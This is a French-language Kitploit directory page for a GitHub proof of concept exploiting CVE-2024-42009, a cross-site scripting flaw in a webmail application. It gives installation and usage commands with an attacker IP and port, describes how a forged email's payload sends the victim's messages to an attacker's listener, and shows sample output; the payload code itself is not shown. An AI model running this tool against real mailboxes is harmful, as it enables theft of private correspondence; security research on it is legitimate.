Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-42009 — Ce Proof of Concept (PoC) démontre une exploitation de la CVE-2024-42009, tirant parti d'une vulnérabilité de script intersite (XSS) pour extraire des e-mails d'une application de webmail cible. L'attaque injecte une charge utile malveillante qui exfiltre le contenu des e-mails vers un écouteur contrôlé par l'attaquant. | Kitploit
Outils/GitHubGitHub/bhanunamikaze/cve-2024-42009
Outils de PhishingReconnaissanceGénération de PayloadsExploitationExploitation d'Applications WebExfiltration de DonnéesCollecte d'InformationsApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce Proof of Concept (PoC) démontre une exploitation de la CVE-2024-42009, tirant parti d'une vulnérabilité de script intersite (XSS) pour extraire des e-mails d'une application de webmail cible. L'attaque injecte une charge utile malveillante qui exfiltre le contenu des e-mails vers un écouteur contrôlé par l'attaquant.

GitHub
bhanunamikaze/cve-2024-42009

CVE-2024-42009

Voir le dépôt
17il y a 1 anPas encore vérifié
Partager

CVE-2024-42009 PoC : Listener de capture d'e-mails et exploitation XSS

Présentation

Cette preuve de concept (PoC) démontre une exploitation de CVE-2024-42009, tirant parti d'une vulnérabilité de cross-site scripting (XSS) pour extraire des e-mails d'une application de webmail cible. L'attaque injecte une charge utile malveillante qui exfiltre le contenu des e-mails vers un listener contrôlé par l'attaquant.

Fonctionnalités

  • Exploite une vulnérabilité XSS pour capturer le contenu des e-mails.
  • Utilise un listener HTTP pour recevoir et décoder les e-mails exfiltrés.
  • Automatise l'injection de la charge utile et l'exfiltration.

Prérequis

  • Python 3.x
  • Dépendances requises (installation via pip) :
    root@kitploit:~
    pip install requests beautifulsoup4
    

Utilisation

Exécutez le script avec les arguments nécessaires :

root@kitploit:~
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337

Paramètres

Déroulement de l'attaque

  1. Démarrer le listener : Le script démarre un serveur HTTP pour capturer les e-mails extraits.
  2. Injecter la charge utile malveillante : La charge utile XSS est envoyée via un e-mail forgé.
  3. Déclencher l'exécution : Lorsque la victime ouvre l'e-mail, la charge utile s'exécute et envoie le contenu de l'e-mail au serveur de l'attaquant.
  4. Capturer et décoder : Le contenu de l'e-mail extrait est décodé et affiché.

Exemple de sortie

root@kitploit:~
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)

[+] Captured Email Content:
Hello, this is a test email!

Avertissement

Je ne revendique ni le crédit, ni la propriété, ni la divulgation de la vulnérabilité et de toutes les exploitations correspondantes hébergées dans ce dépôt GitHub - Tout le crédit revient au chercheur qui l'a découverte ; j'ai simplement créé une POC pour reproduire la vulnérabilité sur la base des données disponibles sur Internet. Cette POC est uniquement destinée à des fins éducatives et de recherche. Tester sans autorisation sur des systèmes sans consentement est illégal. Utilisez-la de manière responsable !

Télécharger l’outil
ArgumentDescription
-fu, --from-userL'adresse e-mail de l'expéditeur
-tu, --to-userL'adresse e-mail du destinataire
-u, --target-urlL'URL du webmail cible
-ip, --server-ipL'adresse IP du listener de l'attaquant
-p, --server-portLe port du listener (par défaut : 1337)